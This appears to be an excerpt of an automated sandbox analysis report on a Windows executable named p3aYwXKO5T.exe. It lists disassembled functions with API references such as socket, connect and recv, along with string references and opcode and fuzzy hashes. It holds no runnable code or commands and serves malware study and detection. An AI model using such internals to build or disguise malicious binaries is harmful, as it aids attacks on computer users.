Instruction Fuzzy Hash: 75E01235641B24F7CB021B50EC09B8E3F58EB05753F144032FA05661619B659D40DBDF

Function 00444C14 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00444C98
__alloca_probe_16.LIBCMT ref: 00444D5E
__freea.LIBCMT ref: 00444DCA

Part of subcall function 0043B04B: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0043B07D

__freea.LIBCMT ref: 00444DD3
__freea.LIBCMT ref: 00444DF6

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
Instruction ID: 3df8754f567642f5bc12b9c6ac1686bc91f11376b98a6e44c20c24ac8824f300
Opcode Fuzzy Hash: 1f817f6d5ac6458dcc7bc62f3b6682248ba7d3e94ffd72069e84dbc94cae19ff
Instruction Fuzzy Hash: 1651D5B2A00216ABFB255F55DC81FBB36A9DFC4754F15012BFD0497251EB38DC1186A8

Function 0232DE47 Relevance: 7.7, APIs: 5, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d23cd4dd6e2fa0143c66012945725be57b8f486d799fb0b8f6dfb3b5511e53
Instruction ID: 5dc8f4cc5cd1312b75fae0f4ba801330b6b6f8269fc1652a85e33df20fcfde7d
Opcode Fuzzy Hash: d6d23cd4dd6e2fa0143c66012945725be57b8f486d799fb0b8f6dfb3b5511e53
Instruction Fuzzy Hash: 5E61A2B0D04718ABDB21DF64CD89B99B7B5EF04310F1042AAE80DA7251EB70EA45CF56

Function 0040DEDE Relevance: 7.6, APIs: 5, Instructions: 142networkCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0040DF4D
recv.WS2_32(?,?,00001F40,00000000), ref: 0040DF86
recv.WS2_32(?,?,00001F40,00000000), ref: 0040DFB4
closesocket.WS2_32(?), ref: 0040E028
__Mtx_unlock.LIBCPMT ref: 0040E05D

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Mtx_unlockrecv$closesocket
String ID:
API String ID: 1157980791-0
Opcode ID: b3ca68a6cb2e0dd676154645a2f8576170dabd98dca11c7a3b3798b3f7b83ddb
Instruction ID: ff851d167357bcc52532b6b7cc28a367e5acf8f97903fc6b0511556a698fdea0
Opcode Fuzzy Hash: b3ca68a6cb2e0dd676154645a2f8576170dabd98dca11c7a3b3798b3f7b83ddb
Instruction Fuzzy Hash: DF51D371D04201EFD7209F51CC89A96B7B5FF04304F1481BFE80AA72A1EB75AD54CB59

Function 0235721B Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0235714D), ref: 0235723D
GetFileInformationByHandle.KERNEL32(?,?), ref: 02357297
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0235714D,?,000000FF,00000000,00000000), ref: 02357325
__dosmaperr.LIBCMT ref: 0235732C
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 02357369

Part of subcall function 02357591: __dosmaperr.LIBCMT ref: 023575C6

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
Instruction ID: 1f7f7f0253cf4f18617cd4417a29230656b7226bfc70b02056fe9aa5be48ef01
Opcode Fuzzy Hash: 19e1070b04fb49a2dd5738f37f72da11fb3a5a43ccc6689087d144dd6161f976
Instruction Fuzzy Hash: 84411875900754ABDB249FA5E844DAFFBFAEF88310B004929ED5AD3620E730D940CB61

Function 0232BC57 Relevance: 7.6, APIs: 5, Instructions: 130comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0232BCBE
CoCreateInstance.COMBASE(00458F80,00000000,00000001,00458F90,?), ref: 0232BCDA
CoUninitialize.COMBASE ref: 0232BCE8
CoUninitialize.COMBASE ref: 0232BDA7
CoUninitialize.COMBASE ref: 0232BDBB

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Uninitialize$CreateInitializeInstance
String ID:
API String ID: 1968832861-0
Opcode ID: 3e1efb8a3acf5b83f8398f094812db7d9444b93ce0f50575ee480a284648f072
Instruction ID: ea1c805093bb5cf99b1ac81d82405eb41401247c9ed7c647967653be529ad777
Opcode Fuzzy Hash: 3e1efb8a3acf5b83f8398f094812db7d9444b93ce0f50575ee480a284648f072
Instruction Fuzzy Hash: 6F41A031A001199FDB04CF64CC85BEEB7BAEF48719F108159F805E7691DB74E944CB90

Function 0234DD97 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0234DDCB

Part of subcall function 02349196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 023491B7

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0234DE2A
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0234DE50
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0234DE70
Concurrency::location::_Assign.LIBCMT ref: 0234DEBD

Part of subcall function 02351599: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 023515DE

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
String ID:
API String ID: 1879022333-0
Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction ID: 0807acbcce854c92f477e4195bf0b5b268a57d276482978e01633756307ca9ff
Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction Fuzzy Hash: 3C41A675600214ABDB26AB24C895BADBBFAEF45B14F0440D9E8069B381CF74BE45CB91

Function 0042DB30 Relevance: 7.6, APIs: 5, Instructions: 123COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DB64

Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50

Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DBC3
Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DBE9
Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0042DC09
Concurrency::location::_Assign.LIBCMT ref: 0042DC56

Part of subcall function 00431332: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431377

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
String ID:
API String ID: 1879022333-0
Opcode ID: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction ID: de4f072aaf1dca0b17399bd929b16a9a875841cf6160958f8114d71bd43867b1
Opcode Fuzzy Hash: 3f867edf2e3fea7535e6fe073452b703bba04c29d155da01a3a84350d07a286a
Instruction Fuzzy Hash: 84412774B04220ABCF199B25D895BAEBB75AF45310F40409FE5065B3C2CB78AD45C7D9

Function 0233EF4D Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0233EF54
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0233EF7E

Part of subcall function 0233F644: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0233F661

Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0233EFFB
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0233F02D
__freea.LIBCMT ref: 0233F053

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
String ID:
API String ID: 2497068736-0
Opcode ID: a6c94f2b07b76275c46f7f4adf28e57aec3c88f13b0cf4508af0eed2d0fdcfcc
Instruction ID: ba535175bf7db68a51c23d88863a21dd14faaf10f5a815fd59d567ade2df9cb1
Opcode Fuzzy Hash: a6c94f2b07b76275c46f7f4adf28e57aec3c88f13b0cf4508af0eed2d0fdcfcc
Instruction Fuzzy Hash: 9931A271E002198BCF26DFA8C440AADB7F6EF48314F55406AE405E7350DB74AF42CB95

Function 004286C9 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 004286EE

Part of subcall function 0041EAD0: _SpinWait.LIBCONCRT ref: 0041EAE8

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428702
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428734
List.LIBCMT ref: 004287B7
List.LIBCMT ref: 004287C6

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: b0a24117a62347580a2ad84b9a89b7294bf208186338a952b26754fdafb675af
Instruction ID: 462aa756160b9a796e7fec1675da630e13b8ae80002d108a4576a0d2cee0735b
Opcode Fuzzy Hash: b0a24117a62347580a2ad84b9a89b7294bf208186338a952b26754fdafb675af
Instruction Fuzzy Hash: C9318832A02265DFCB14EFA5E9816DEB7B1BF44308FA4406FD80167242CB79AD05CB99

Function 023475CB Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 02347617
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 02347659
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 02347675
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 02347680
std::invalid_argument::invalid_argument.LIBCONCRT ref: 023476A7

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
String ID:
API String ID: 3897347962-0
Opcode ID: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
Instruction ID: e666693025e8a233cfd7ac9be2c31b1e15c9d1aceaf0460e2c642f973a5835c7
Opcode Fuzzy Hash: c12b9fb7ade3771b82fb90936bc3b93d705f62869cacdabd48ca9c13149a27d9
Instruction Fuzzy Hash: 10216D74A00208AFCB15EFA9C494AADB7F6BF09354F1040E9D901AB261DF38BE05CF94

Function 0040DDCF Relevance: 7.6, APIs: 5, Instructions: 80networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000000,?,?), ref: 0040DE2C
FreeAddrInfoW.WS2_32(?), ref: 0040DE4D
socket.WS2_32(00000002,00000001,00000000), ref: 0040DE75
connect.WS2_32(00000000,?,00000010), ref: 0040DE87
closesocket.WS2_32(00000000), ref: 0040DEA1

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: AddrFreeInfoclosesocketconnectgetaddrinfosocket
String ID:
API String ID: 242599585-0
Opcode ID: d3982aedac2a5c94766331ef093bc1566eeb3870826ac122965e00373034951a
Instruction ID: 23abe507401a6561ed447c90683016714f9a9af45c9242d02c2306d312d96357
Opcode Fuzzy Hash: d3982aedac2a5c94766331ef093bc1566eeb3870826ac122965e00373034951a
Instruction Fuzzy Hash: 9E218875E053149BDB249BA1DC89FEE7368DF18301F0000BBF909A62C1D7789D948B5A

Function 0235F2A1 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0235F2B9

Part of subcall function 0235B05C: HeapFree.KERNEL32(00000000,00000000,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?), ref: 0235B072
Part of subcall function 0235B05C: GetLastError.KERNEL32(?,?,0235F334,?,00000000,?,?,?,0235F35B,?,00000007,?,?,0235F75D,?,?), ref: 0235B084

_free.LIBCMT ref: 0235F2CB
_free.LIBCMT ref: 0235F2DD
_free.LIBCMT ref: 0235F2EF
_free.LIBCMT ref: 0235F301

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction ID: 62f7361aab454a046258a812de2dfaf40b220ba2786e2721d1cb4f87989fa159
Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction Fuzzy Hash: DAF062B6515620B7C630EB54E695C1AB7DAFE017287640805F85CD7D90DB70F880CA54

Function 0043F03A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043F052

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 0043F064
_free.LIBCMT ref: 0043F076
_free.LIBCMT ref: 0043F088
_free.LIBCMT ref: 0043F09A

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction ID: afd9a687733b4b320e977570e7283cbf07406cc3be8dc42b58a2af08add3b970
Opcode Fuzzy Hash: 9c86520c17fee5bb977a366526a4cd1d97e426023ecba6e0783088212fd463c3
Instruction Fuzzy Hash: 7AF06832904604FB8534EB5DE681C0773FBEA48312B54281BF048D7611CBB8FC84465D

Function 0235DC85 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0235DE1F

Strings

*?, xrefs: 0235DCC8

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
Instruction ID: 5f74b117258023abc888a003ec8f3e4f8598199dd752a14e66c67c0290104da1
Opcode Fuzzy Hash: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
Instruction Fuzzy Hash: 1C611CB5E00229AFDB24DFA8C8819EDFBF5EF49710B1481AAD819E7340D7759E41CB90

Function 0043DA1E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0043DBB8

Strings

*?, xrefs: 0043DA61

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
Instruction ID: 8444feb9c58af159b24f360d524a1af6424cb6e40e41c758a4baa9ba100f3a22
Opcode Fuzzy Hash: 9ef204f46e1e9e6e895b4fd4c09f2a6869b2f7b57ccd26facbf7b5b5b709429c
Instruction Fuzzy Hash: 1E618DB1E002199FCB14DFA9D8815EEFBF5EF4C310F25916AE845E7300E639AE418B94

Function 004426F2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 0044275C
_free.LIBCMT ref: 0044274A

Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D

_free.LIBCMT ref: 00442916

Strings

XgE, xrefs: 00442705, 0044270B

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: XgE
API String ID: 2155170405-2984570469
Opcode ID: 408f858600a1f53604d9e13eb6c4a6de5f766e6ad14c8f26f7ae90bdf88e241d
Instruction ID: 8084bd392b0667b16f992d69d3ac30f533f8d402883a3cc5e9c46bc507ca970f
Opcode Fuzzy Hash: 408f858600a1f53604d9e13eb6c4a6de5f766e6ad14c8f26f7ae90bdf88e241d
Instruction Fuzzy Hash: 3B5117B1900215ABFB10EF65CE819AEB7B8EF44314F51026BF510E3291EBF89E418B59

Function 02359280 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

`&x, xrefs: 023592D1
C:\Users\user\Desktop\p3aYwXKO5T.exe, xrefs: 023592C3, 02359300

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\p3aYwXKO5T.exe$`&x
API String ID: 0-784599195
Opcode ID: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
Instruction ID: d7aa268c8861baf501a6b9acfe38364663fa0882c1f56ce56575111fe9104e01
Opcode Fuzzy Hash: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
Instruction Fuzzy Hash: AC415571A00228EBDB35DF99DC80EAEBBFDEB85310F140066ED0897291D7749A40CB95

Function 00439019 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\p3aYwXKO5T.exe, xrefs: 0043905C, 00439099
`&x, xrefs: 0043906A

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\p3aYwXKO5T.exe$`&x
API String ID: 0-784599195
Opcode ID: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
Instruction ID: 5a6a14289eafe60ce2143b443f35f28c3b9330844cb9aa4b0d6a2bcf37f19cd6
Opcode Fuzzy Hash: 7990cc60f13bbf5db04e74938bd2c0700eb67712c1365d603b23e261442dbb4b
Instruction Fuzzy Hash: B841A571A00219AFDB159F9ACC859AFBBF8EB8D310F10106BE404A7351E7F48E41CB59

Function 02354AA7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 02354AE6
__IsNonwritableInCurrentImage.LIBCMT ref: 02354B9A

Strings

csm, xrefs: 02354B84
S9C, xrefs: 02354B8C, 02354B95, 02354BA6

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: S9C$csm
API String ID: 3480331319-582408667
Opcode ID: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
Instruction ID: ff0e5ce5bc118424c35e3cf764c6f3c838c0dd36e9475bc69109aa6362197d32
Opcode Fuzzy Hash: a4331c987b1b53513cbe21c672c92ef55e4810aa54a37fe5f5d469cf9e84ef45
Instruction Fuzzy Hash: 4141D638E00624ABCF14DF68C884FAD7BB5AF44318F148155EE589B392D771DA45CF91

Function 023558C2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 023558E7
CatchIt.LIBVCRUNTIME ref: 023559CD

Strings

RCC, xrefs: 02355901
MOC, xrefs: 023558F9

Memory Dump Source

Source File: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2320000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
Instruction ID: 7cb61a0fad70e7d45995c257528fdedd0d5f07581c451d520188681437fe483d
Opcode Fuzzy Hash: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
Instruction Fuzzy Hash: 5E414771900219AFCF15DF94C881EEEBBB6BF48314F558099FD18A7211D339A950DB91

Function 0043565B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 00435680
CatchIt.LIBVCRUNTIME ref: 00435766

Strings

MOC, xrefs: 00435692
RCC, xrefs: 0043569A

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
Instruction ID: 5e74a0003837bbbf1c0f5d1cc79d9a8e9fb2d82c4166bdd95ad30412f998441c
Opcode Fuzzy Hash: e76bbd798ac2a2531b018cbcd065df587f22d77e50faeab241abe2fb58f9e970
Instruction Fuzzy Hash: 4A418871900609EFCF15CF98DC82AEEBBB5BF4C304F18909AF90867221D339A950DB58

Function 0043E4B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0043E259: GetOEMCP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E284

_free.LIBCMT ref: 0043E528

Strings

@"F, xrefs: 0043E550
avC, xrefs: 0043E4B8

Memory Dump Source

Source File: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685965706.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685965706.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_p3aYwXKO5T.jbxd

Yara matches

Similarity

API ID: _free
String ID: @"F$avC
API String ID: 269201875-3024483575
Opcode ID: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
Instruction ID: c2258c4a8f5ad0cbd888ce205a5b2d9973e5ee0a434949fbdbaf9cd53865a0ee
Opcode Fuzzy Hash: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
Instruction Fuzzy Hash: 5131BE71800249AFDB01DFAAD841B9F7BF5EF48318F1010AAF8109B2A2EB79DD50CB55

